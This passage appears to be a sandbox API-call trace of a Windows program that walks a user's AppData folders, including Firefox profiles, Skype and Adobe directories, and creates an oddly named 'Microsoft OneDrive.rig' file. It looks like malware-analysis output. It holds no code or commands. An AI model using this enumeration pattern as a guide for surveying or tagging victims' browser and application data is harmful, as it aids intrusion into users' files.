lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.562] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions" [0083.562] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0083.562] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.562] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.562] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox" [0083.562] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0083.562] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.563] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Crash Reports" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0083.563] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0083.563] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.563] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.563] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Profiles" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0083.563] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0083.563] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.563] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.563] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.563] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.564] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.564] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.564] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.564] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.564] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.564] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x18be28 | out: lpFindFileData=0x18be28) returned 0x586d20 [0083.564] FindClose (in: hFindFile=0x586d20 | out: hFindFile=0x586d20) returned 1 [0083.564] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.565] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.565] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.565] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.565] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.565] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.565] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.565] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.565] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.565] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.565] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.565] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.565] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.565] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.565] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.566] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.566] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.566] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.566] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.566] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.566] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.566] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.566] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.566] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.566] PathFindExtensionW (pszPath="Microsoft OneDrive.lnk") returned=".lnk" [0083.566] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\microsoft onedrive.rig"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0083.568] CloseHandle (hObject=0x148) returned 1 [0083.568] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0083.568] GetNamedSecurityInfoW () returned 0x0 [0083.568] LocalFree (hMem=0x572028) returned 0x0 [0083.568] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpSrch="microsoft") returned 0x0 [0083.568] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpSrch="firefox") returned 0x0 [0083.568] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*", lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 0x586b20 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.568] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned 0 [0083.568] GetNamedSecurityInfoW () returned 0x0 [0083.569] LocalFree (hMem=0x571fe8) returned 0x0 [0083.569] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0083.569] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0083.569] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.569] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.569] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.569] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned 0 [0083.569] GetNamedSecurityInfoW () returned 0x0 [0083.569] LocalFree (hMem=0x572028) returned 0x0 [0083.569] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="microsoft") returned 0x0 [0083.569] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="firefox") returned 0x0 [0083.569] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.569] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.569] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.569] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned 0 [0083.569] GetNamedSecurityInfoW () returned 0x0 [0083.570] LocalFree (hMem=0x571fe8) returned 0x0 [0083.570] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="microsoft") returned 0x0 [0083.570] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="firefox") returned 0x0 [0083.570] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.570] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.570] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.570] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned 1 [0083.570] GetNamedSecurityInfoW () returned 0x0 [0083.570] LocalFree (hMem=0x572028) returned 0x0 [0083.570] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="microsoft") returned 0x0 [0083.570] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="firefox") returned 0x0 [0083.570] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.570] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.570] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.570] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.570] Sleep (dwMilliseconds=0x0) [0083.570] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.570] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.571] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned 1 [0083.571] GetNamedSecurityInfoW () returned 0x0 [0083.571] LocalFree (hMem=0x571fe8) returned 0x0 [0083.571] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="microsoft") returned 0x0 [0083.571] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="firefox") returned 0x0 [0083.571] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.571] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.571] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.571] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.571] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.571] Sleep (dwMilliseconds=0x0) [0083.571] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.571] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0083.571] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned 0 [0083.571] GetNamedSecurityInfoW () returned 0x0 [0083.572] LocalFree (hMem=0x572028) returned 0x0 [0083.572] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="microsoft") returned 0x0 [0083.572] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="firefox") returned 0x0 [0083.572] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.572] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.572] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.572] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.572] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.572] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.572] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.572] Sleep (dwMilliseconds=0x0) [0083.574] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.574] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.574] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned 0 [0083.574] GetNamedSecurityInfoW () returned 0x0 [0083.574] LocalFree (hMem=0x571fe8) returned 0x0 [0083.574] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="microsoft") returned 0x0 [0083.574] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="firefox") returned 0x0 [0083.574] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.574] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.574] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.574] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.574] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.574] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.574] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned 0 [0083.574] GetNamedSecurityInfoW () returned 0x0 [0083.574] LocalFree (hMem=0x572028) returned 0x0 [0083.574] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="microsoft") returned 0x0 [0083.574] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="firefox") returned 0x0 [0083.574] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.575] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c60 [0083.575] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.575] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.575] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.575] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.575] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.575] Sleep (dwMilliseconds=0x0) [0083.575] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.575] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.575] Sleep (dwMilliseconds=0x0) [0083.576] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.576] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.576] Sleep (dwMilliseconds=0x0) [0083.576] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.576] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.576] Sleep (dwMilliseconds=0x0) [0083.578] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.578] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.578] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0083.578] GetNamedSecurityInfoW () returned 0x0 [0083.578] LocalFree (hMem=0x571fe8) returned 0x0 [0083.578] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.578] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0083.578] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.578] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.578] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.578] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.578] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.578] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 1 [0083.578] GetNamedSecurityInfoW () returned 0x0 [0083.579] LocalFree (hMem=0x572028) returned 0x0 [0083.579] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="microsoft") returned 0x0 [0083.579] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="firefox") returned 0x0 [0083.579] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" 